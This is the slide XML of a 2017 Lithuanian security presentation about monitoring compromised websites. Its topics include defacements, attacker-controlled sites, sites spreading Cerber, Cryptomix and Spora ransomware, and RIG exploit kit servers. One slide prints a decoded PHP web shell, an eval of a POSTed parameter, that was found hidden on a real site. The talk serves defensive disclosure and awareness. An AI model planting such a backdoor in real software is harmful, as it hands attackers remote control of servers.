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9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9" r:id="rId35"/>
    <p:sldId id="300" r:id="rId36"/>
    <p:sldId id="290" r:id="rId37"/>
    <p:sldId id="298" r:id="rId38"/>
    <p:sldId id="291" r:id="rId39"/>
    <p:sldId id="301" r:id="rId40"/>
    <p:sldId id="292" r:id="rId41"/>
    <p:sldId id="303" r:id="rId42"/>
    <p:sldId id="305" r:id="rId43"/>
    <p:sldId id="294" r:id="rId44"/>
    <p:sldId id="304" r:id="rId45"/>
    <p:sldId id="295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mexpro.lt/client/images/span_bg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yrimai.esec.lt/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:darius@esec.l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600" b="1" dirty="0"/>
              <a:t>Pamatyti "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>nematomą</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>”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K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" b="1" dirty="0" smtClean="0"/>
              <a:t>iek </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" b="1" dirty="0"/>
              <a:t>bitcoin-ų kainuoja internetas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integer.su.lt (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>2017.04.20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty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90407" cy="5083902"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42471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Svetainių klaidos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sz="4400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="lt-LT" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>Svetainių </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0"/>
              <a:t>klaidos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rinkimai.elta.lt (2017.04.14)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924800" cy="5213030"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6921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www.evv.lt (2017.04.14)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75991" cy="4838545"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2013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www.evv.lt (2017.04.14)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7340876" cy="2686402"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7736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rusradio.lt (2017.04.20)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0" y="1676400"/>
            <a:ext cx="8455100" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17672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Valdomos svetainės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4400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="lt-LT" sz="4400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>Valdomos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0"/>
              <a:t>svetainės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977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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean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www.mexpro.lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT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client/images/span_bg.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (2017.04.17)</a:t>
            </a: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1465"/>
            <a:ext cx="8229600" cy="3343433"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19483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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.mexpro.lt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dirty="0" smtClean="0"/>
              <a:t>Dekodavus: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isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($_POST["zz1"])) {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stripslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($_POST["zz1"]));}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39445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7244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www.musumenas.lt/client/images/left_bottom.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2017.04.17</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="lt-LT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4675"/>
            <a:ext cx="8229600" cy="3897013"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3358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Darius Povilaitis, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>SANS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0"/>
              <a:t>sertifikuotas įsilaužimų analitikas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Svetainių </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0"/>
              <a:t>saugumo patikrinimai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0"/>
              <a:t>svetainių apsauga ( WAF-ai )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="lt-LT" b="1" dirty="0"/>
              <a:t>Svetainių saugumo stebėsena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>atakos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0"/>
              <a:t>Mobilios platformos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0"/>
              <a:t>DDOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>gynyba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0"/>
              <a:t>/ DDOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kontroliuojamos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>atakos</a:t>
            </a:r>
            <a:endParaRPr lang="lt-LT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>darius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>esec.lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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tyrimai.esec.lt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7244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www.mineralai.lt/client/images/menul0_start.jpg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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2017.04.17)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="lt-LT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5166"/>
            <a:ext cx="8229600" cy="2096030"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10555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nslookup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857999" cy="5062445"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29976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www.bing.com – ip: direktyva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620000" cy="5093267"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40551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„Baltnetos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>komunikacijos“,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="lt-LT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP: 213.197.148.36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2826233"/>
            <a:ext cx="2819400" cy="2073897"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19058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76200"/>
            <a:ext cx="5029200" cy="715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0"/>
              <a:t>„Interneto vizija“,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="lt-LT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0"/>
              <a:t>IP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>79.98.26.139 (kontrolėsmigracija)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1629569"/>
            <a:ext cx="2247900" cy="4467225"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10077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61722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senojianimacija.lt/wp-content/themes/detube/images/social.png (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2017.04.17)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5293"/>
            <a:ext cx="8229600" cy="4235777"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39569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Atakuojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>čios svetainės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4400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="lt-LT" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Atakuojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0"/>
              <a:t>čios svetainės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951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Cerber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77" y="1600200"/>
            <a:ext cx="6713845" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22467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Cerber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demo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4400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="lt-LT" sz="4400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>Cerber demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>(anglonas.fotonija.lt)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634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Cryptomix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7030736" cy="4939996"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36023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Įž</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>angin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>ė</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>astabos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pPr algn="just"/>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Skaidrėse nurodyta data – tai buvo aktualu / veikė nurodyti datai ( tikėtina, kad aktualu ir šiam momentui )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Bandymai lankytis nurodytose svetainėse gali būti pavojingi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Cryptomix demo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4400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="lt-LT" sz="4400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>Cryptomix demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>(www.svara.lt)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240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SPORA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407"/>
            <a:ext cx="8229600" cy="4317549"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21484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SPORA demo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4400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="lt-LT" sz="4400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>SPORA demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>(dpukmerge.lt)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270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Informacijos šaltiniai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11" y="1600200"/>
            <a:ext cx="6376578" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4481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Informacijos publikavimas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cyberthreat@googlegroups.com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35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Informacijos publikavimas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 smtClean="0"/>
              <a:t>http://tyrimai.esec.lt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654"/>
            <a:ext cx="9144000" cy="47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Informacijos pritaikymas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r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Gynyba</a:t>
            </a:r>
            <a:endParaRPr lang="lt-LT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Saugumo testai</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Saugumo produktų įvertinimai</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Įmonės tinklų saugumo patikrinimai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Informacijos pritaikymas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r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Tokiu būdu surinkta informacija gali būti panaudoti žvalgybiniams tikslams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Plataus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>masto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>žaibiškiems įsilaužimams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Masinėms ir efektyvioms DDOS atakoms</a:t>
            </a:r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Įmonės tinklo saugumo patikrinimas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91" y="1600200"/>
            <a:ext cx="4692818" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8889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Saugumo produktų patikrinimas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4400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="lt-LT" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>DEMO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>(Sophos endpoint protection)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621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Svetain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>ių stebėsena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dirty="0" smtClean="0"/>
              <a:t>Klasifikacija:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Demo hackai – dažniausiai nepavojingi, skirti pasigirti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Svetainių klaidos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Valdomos svetainės</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Atakuojančios svetainės</a:t>
            </a:r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826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Įmonės tinklų apsauga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624806"/>
            <a:ext cx="7410450" cy="4476750"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26339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RIG-o serveriai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1" y="1600200"/>
            <a:ext cx="7792218" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7475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RIG-o stabdymas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lt-LT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="lt-LT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Turint šią informaciją ir blokavus prieigą prie šių IP adresų, buvo galima išvengti  kompiuterių užšifravimo įmonės / įstaigos / valstybės lygmeniu. Informacija buvo aktuali 2017.01 – 2017.02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76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Svetainė su įdiegtu WAF-u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9597"/>
            <a:ext cx="8229600" cy="3247169"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36841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LT hackers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6240"/>
            <a:ext cx="7467600" cy="5250443"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5382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pPr algn="just"/>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Tie, kurie nesirūpina savo IT resursais - sukelia grėsmę kitiems. Tai - kaip eismo taisyklės - pažeidėjai gauna bausmes. Internete - baudžiami nekaltieji.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="lt-LT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="lt-LT" dirty="0" smtClean="0"/>
              <a:t>Visai pateiktai informacijai yra surinkti įrodymai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Klausimai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sz="4400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="lt-LT" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>Klausimai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty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336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Demo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" b="1" dirty="0" smtClean="0"/>
              <a:t>hacks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b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="lt-LT" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>Demo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="lt-LT" sz="4400" b="1" dirty="0"/>
              <a:t>hacks</a:t>
            </a:r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www.jotvingiai.alytus.lm.lt (2017.04.15)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5" y="1600200"/>
            <a:ext cx="7660870" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5944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www.iliuzija.lt (2017.04.14)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0" y="1600200"/>
            <a:ext cx="7795580" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9066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www.kvc.vgtu.lt (2017.04.15)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391400" cy="4879811"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5654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www.alauspurslai.lt (2017.04.14)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83954"/>
            <a:ext cx="7543800" cy="51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365</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>114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Pamatyti "nematomą”</vt:lpstr>
      <vt:lpstr>Apie</vt:lpstr>
      <vt:lpstr>Įžanginės pastabos</vt:lpstr>
      <vt:lpstr>Svetainių stebėsena</vt:lpstr>
